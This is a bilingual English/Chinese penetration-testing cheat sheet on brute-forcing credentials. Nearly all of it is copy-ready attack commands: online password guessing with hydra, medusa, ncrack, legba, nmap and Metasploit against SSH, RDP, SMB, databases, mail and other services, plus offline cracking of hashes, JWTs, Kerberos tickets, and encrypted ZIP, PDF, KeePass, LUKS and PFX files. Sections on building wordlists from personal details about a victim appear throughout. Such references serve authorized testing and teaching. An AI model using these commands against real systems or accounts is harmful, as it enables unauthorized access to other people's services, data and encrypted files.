Brute Force - CheatSheet
暴力破解 - 速查表
使用 Trickest 来轻松构建和 自动化工作流程,使用世界上 最先进 的社区工具。 立即获取访问权限:
默认凭证
在谷歌中搜索正在使用的技术的默认凭证,或者尝试以下链接:
创建您自己的字典
尽可能多地了解目标的信息,并生成自定义字典。可能有用的工具:
Crunch
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%Cewl
Cewl is a tool used to generate custom wordlists by crawling a target's website and extracting unique words. It can be used to create wordlists for brute-forcing passwords based on the target's specific interests or content.
cewl example.com -m 5 -w words.txt基于对受害者的了解(姓名、日期等)生成密码
python3 cupp.py -h一个字典生成工具,允许您提供一组单词,从给定的单词中创建多个变体,生成一个独特且理想的字典,以用于特定目标。
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.字典列表
使用 Trickest 可轻松构建和自动化工作流程,利用全球最先进的社区工具。 立即获取访问权限:
服务
按服务名称按字母顺序排列。
AFP
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> runAJP
AJP
nmap --script ajp-brute -p 8009 <IP>AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
AMQP(ActiveMQ、RabbitMQ、Qpid、JORAM和Solace)
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]Cassandra
Brute Force
Brute force attacks against Cassandra involve attempting to guess valid credentials by systematically trying all possible combinations of usernames and passwords. This is typically achieved by using automated tools that can rapidly generate and test different combinations until the correct one is found.
Prevention
To prevent brute force attacks against Cassandra, it is recommended to implement strong password policies, such as using complex and lengthy passwords, enabling account lockout mechanisms after a certain number of failed login attempts, and monitoring the system for any unusual login patterns that may indicate a brute force attack in progress. Additionally, using multi-factor authentication can add an extra layer of security to help mitigate the risk of unauthorized access.
nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042CouchDB
Brute Force
Description
Brute forcing CouchDB involves attempting to guess valid credentials by systematically trying all possible combinations of usernames and passwords.
Detection
Monitor authentication logs for multiple failed login attempts from the same source IP address.
Prevention
Implement account lockout policies after a certain number of failed login attempts.
Enforce strong password policies to make brute forcing more difficult.
Consider implementing multi-factor authentication to add an extra layer of security.
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /Docker Registry
Docker注册表
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/Elasticsearch
Elasticsearch
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /FTP
FTP (File Transfer Protocol) is a standard network protocol used to transfer files between a client and a server on a computer network. FTP typically operates on port 21.
Brute Force Attack
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21HTTP 通用暴力破解
HTTP基本身份验证
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/HTTP - NTLM
Brute Force
Brute forcing NTLM hashes is a common technique used to crack passwords. Tools like hashcat and John the Ripper can be used to perform brute force attacks against NTLM hashes. These tools allow you to try a large number of password combinations in a short amount of time, increasing the chances of finding the correct password. It is important to use a good wordlist and rules when performing brute force attacks to maximize the chances of success.
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/HTTP - Post Form
HTTP - 提交表单
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https对于https,您必须从"http-post-form"更改为"https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTPIMAP
IMAP (Internet Message Access Protocol) is a widely used protocol for email retrieval. It operates over port 143 and allows an email client to access email on a remote mail server. IMAP can be a target for brute force attacks to gain unauthorized access to email accounts.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993IRC
IRC
Internet Relay Chat(IRC)是一种实时互联网通信协议,用于在网络上进行文本通信。IRC通常用于群组聊天和私人对话。
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>ISCSI
ISCSI
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>JWT
JSON Web Tokens(JWT)是一种用于在网络应用之间传递信息的开放标准(RFC 7519)。它通过使用数字签名对信息进行验证和信任。
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6LDAP
LDAP(轻型目录访问协议)是一种用于访问和维护分布式目录信息服务的协议。
nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-matchMQTT
MQTT
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txtMongo
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txtMSSQL
MSSQL
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433MySQL
MySQL
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306OracleSQL
OracleSQL
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt为了使用oracle_login与patator,您需要安装:
pip3 install cx_Oracle --upgrade离线 OracleSQL 哈希暴力破解(版本 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, 和 11.2.0.3):
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30POP
POP
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
# Insecure
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:110
# SSL
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:995 --pop3-sslPostgreSQL
PostgreSQL
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432PPTP
您可以从https://http.kali.org/pool/main/t/thc-pptp-bruter/下载.deb软件包进行安装。
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>RDP
RDP (Remote Desktop Protocol) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP is commonly used for remote administration and accessing virtual desktops.
Brute Force
Brute force attacks against RDP involve attempting to login to an RDP server by systematically trying all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective if weak credentials are used. It is important to use strong, complex passwords and implement account lockout policies to prevent brute force attacks.
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]Redis
Redis
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]Rexec
Rexec
Rexec is a simple service that allows users to execute commands on a remote system. It is often used by administrators to manage servers and network devices. Rexec is a plaintext protocol, which means that data is not encrypted during transmission. This makes it vulnerable to eavesdropping attacks. An attacker can use a brute-force attack to guess the username and password of the Rexec service and gain unauthorized access to the remote system.
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -VRlogin
Rlogin是一种远程登录协议,通常用于UNIX系统。攻击者可以使用暴力破解技术尝试破解Rlogin账户的密码。
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -VRsh
Rsh(远程shell)是一种基于文本的远程登录协议,类似于SSH。攻击者可以使用暴力破解技术尝试猜测用户的密码来访问远程系统。
hydra -L <Username_list> rsh://<Victim_IP> -v -Vhttp://pentestmonkey.net/tools/misc/rsh-grind
Rsync
Rsync
Rsync
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>RTSP
RTSP
hydra -l root -P passwords.txt <IP> rtspSFTP
SFTP (Secure File Transfer Protocol) is a secure way to transfer files between machines over a secure channel. It provides encryption for both authentication credentials and data transferred between the client and server.
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22SNMP
SNMP
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmpSMB
SMB
SMB
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]SMTP
Simple Mail Transfer Protocol(简单邮件传输协议)
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username [email protected] --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]SOCKS
SOCKS
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080SQL Server
Brute Force
Brute force attacks against SQL Server involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to use strong, complex passwords and implement account lockout policies to protect against brute force attacks.
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENTSSH
SSH(Secure Shell)是一种加密网络协议,用于通过不安全的网络安全地进行远程访问和控制。
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22弱SSH密钥 / Debian可预测PRNG
一些系统在用于生成加密材料的随机种子中存在已知缺陷。这可能导致密钥空间大幅缩小,可以使用工具(如snowdroppe/ssh-keybrute)对其进行暴力破解。还可以使用预生成的弱密钥集,例如g0tmi1k/debian-ssh。
STOMP(ActiveMQ、RabbitMQ、HornetQ和OpenMQ)
STOMP文本协议是一种广泛使用的消息传递协议,允许与流行的消息队列服务(如RabbitMQ、ActiveMQ、HornetQ和OpenMQ)进行无缝通信和交互。它提供了一种标准化和高效的方法来交换消息并执行各种消息操作。
legba stomp --target localhost:61613 --username admin --password data/passwords.txtTelnet
Telnet是一种用于远程登录的网络协议。攻击者可以使用暴力破解技术尝试破解Telnet服务的凭据。攻击者通常会使用常见的用户名和密码组合进行尝试,以获取对目标系统的访问权限。
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any pluginVNC
VNC
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lstWinrm
Winrm
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt使用Trickest 可轻松构建和自动化工作流,利用全球最先进的社区工具。 立即获取访问权限:
本地
在线破解数据库
http://hashtoolkit.com/reverse-hash?(MD5 & SHA1)https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
https://crackstation.net/ (Hashes)
https://md5decrypt.net/ (MD5)
https://gpuhash.me/ (Hashes and file hashes)
https://hashes.org/search.php (Hashes)
https://www.cmd5.org/ (Hashes)
https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
在尝试对哈希进行暴力破解之前,请查看这些内容。
ZIP
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zipzip2john file.zip > zip.john
john zip.john#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack已知明文 zip 攻击
您需要知道加密 zip 文件中包含的文件的明文(或部分明文)。您可以通过运行以下命令来检查加密 zip 中包含的文件的文件名和文件大小:7z l encrypted.zip
从发布页面下载 bkcrack。
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password7z
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.johnPDF
PDF
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdfPDF Owner Password
要破解PDF所有者密码,请查看此链接:https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/
JWT
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-JohnNTLM破解
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.potKeepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hashKeberoasting
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi破解LUKS加密
方法1
安装:https://github.com/glv2/bruteforce-luks
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt方法 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mntMysql
另一个Luks BF教程: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9dPGP/GPG私钥
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hashCisco
DPAPI Master Key
使用https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py然后运行john
Open Office Pwd Protected Column
如果您有一个由密码保护的列的xlsx文件,您可以取消保护它:
将其上传到谷歌云盘,密码将自动删除
手动进行删除:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .PFX 证书
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx使用 Trickest 来轻松构建和自动化工作流程,使用世界上最先进的社区工具。 立即获取访问权限:
工具
哈希示例: https://openwall.info/wiki/john/sample-hashes
哈希标识符
hash-identifier
> <HASH>字典列表
Rockyou
字典生成工具
kwprocessor: 高级键盘漫步生成器,可配置基本字符、键位图和路径。
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txtJohn变异
阅读 /etc/john/john.conf 并进行配置
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rulesHashcat
Hashcat 攻击
字典攻击 (
-a 0) with rules
Hashcat 已经带有一个包含规则的文件夹,但你也可以在这里找到其他有趣的规则。
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule字典组合器 攻击
可以使用 hashcat 将 2 个字典合并为 1 个。
如果列表 1 包含单词 "hello",第二个包含两行单词 "world" 和 "earth"。将生成单词 helloworld 和 helloearth。
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!掩码攻击 (
-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask字典 + 掩码 (
-a 6) / 掩码 + 字典 (-a 7) 攻击
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txtHashcat 模式
hashcat --example-hashes | grep -B1 -A2 "NTLM"破解 Linux Hashes - /etc/shadow 文件
Brute-forcing is a common technique used to crack password hashes. In the case of Linux systems, the password hashes are stored in the /etc/shadow file. By brute-forcing these hashes, an attacker can potentially recover the original passwords.
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-SystemsBrute Force
Brute force attacks are a common way to crack Windows hashes. This method involves trying all possible combinations of characters until the correct password is found. There are various tools available to automate the brute force process, such as John the Ripper and Hashcat.
Steps to Crack Windows Hashes using Brute Force:
Capture the Hash: Obtain the Windows hash that you want to crack.
Choose a Tool: Select a suitable tool for brute force attacks.
Set Parameters: Configure the tool with the necessary parameters, such as character set, minimum and maximum password length, etc.
Initiate the Attack: Start the brute force attack using the chosen tool.
Wait for Results: Depending on the complexity of the password, the tool will continue trying different combinations until the correct one is found.
Access the Password: Once the correct password is identified, you can use it to access the Windows system.
It is important to note that brute force attacks can be time-consuming, especially for complex passwords. Additionally, using strong and unique passwords can help prevent successful brute force attacks.
3000 | LM | Operating-Systems
1000 | NTLM | Operating-SystemsBrute-Force
Brute-forcing is a common technique used to crack hashes. It involves trying all possible combinations of characters until the correct one is found. This method is often used when other techniques, such as dictionary attacks, fail to crack the hash.
Tools
There are several tools available for brute-forcing hashes, including:
Hashcat: A popular password cracking tool that supports multiple hashing algorithms.
John the Ripper: Another widely used password cracking tool that can perform brute-force attacks.
Hydra: A versatile password cracking tool that supports various protocols and services.
Methodologies
When brute-forcing hashes, it is important to consider the following methodologies:
Character Set: Determine the character set used in the hash (e.g., lowercase letters, uppercase letters, numbers, special characters).
Password Length: Estimate the password length to narrow down the search space.
Optimization: Use rules and optimizations to speed up the brute-forcing process.
Wordlists: Combine brute-forcing with wordlists to increase the chances of success.
By following these methodologies and using the right tools, hackers can increase their chances of successfully cracking common application hashes.
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
